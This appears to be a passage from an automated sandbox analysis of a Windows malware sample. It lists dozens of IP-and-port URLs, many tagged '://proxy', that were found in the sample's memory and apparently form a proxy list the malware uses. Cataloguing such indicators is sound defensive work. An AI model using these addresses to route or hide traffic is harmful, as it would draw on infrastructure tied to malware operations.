                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.230.219:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.205.197.226:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.205.197.226:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.220.43.146:26024
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.220.43.146:26024://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.225.170.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.225.170.25:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.225.170.25:4153://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.225.170.25:4153HJ
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A15B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.226.240.58:6666
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.226.240.58:6666://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.247.92.63:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.247.92.63:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.78.207:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.78.207:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD897F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.125:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD897F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.125:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD897F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.125:8080p
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:1555
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:1555://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:25416
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:25416://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:25675
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:25675://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:25825://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:28695
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:28695://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:29718
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:29718://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:30747
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:30747://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:42571
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:42571://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:54467
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:54467://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:55425
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:55425://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:59727
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:59727://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:7785
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:7785://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:10824
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:10824://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:29212
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:29212://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:20491://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:26927
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:26927://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:33899
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:33899://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:63462
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:63462://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:16691
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:16691://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:25137
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:25137://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:18374
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:18374://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AA23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:42086
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:42086://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:53903
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.47:19600
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.47:19600://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:21286://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:36073
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:36073://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:50903
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:50903://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:38157
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:38157://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.242.212.50:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.2.26:21231
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.164.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.164.166:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.164.166:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.205.129:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.205.129:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B3FD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.141.102:14888
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.141.102:14888://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.141.102:47851
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.141.102:47851://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89797000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.90.212.2:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.90.212.2:4153://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:1080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.6
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:1081
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:1081://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.159.98:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A31B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.252.170:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.252.170:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.177.106.178:2324
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.177.106.178:2324://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A0A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.211.217:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A0A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.211.217:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.206.19.246:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.206.19.246:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.252.168:9180://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.231.199.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.231.199.226:1971
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.231.199.226:1971://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.17.79:3888
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.17.79:3888://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.104.21:24815
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.104.21:24815://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.5.29:54651
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.5.29:54651://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.48.193.2
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.48.193.246:1080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.48.193.246:1080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.56.254.139:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.56.254.139:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.71.125.50:49882://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.78.119.94:1080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A1AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.78.119.94:1080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.158.126://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.158.126:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.158.126e/
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.1
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.16:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.16:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.2
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CA1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.29:31679
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8CB56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.7:31653
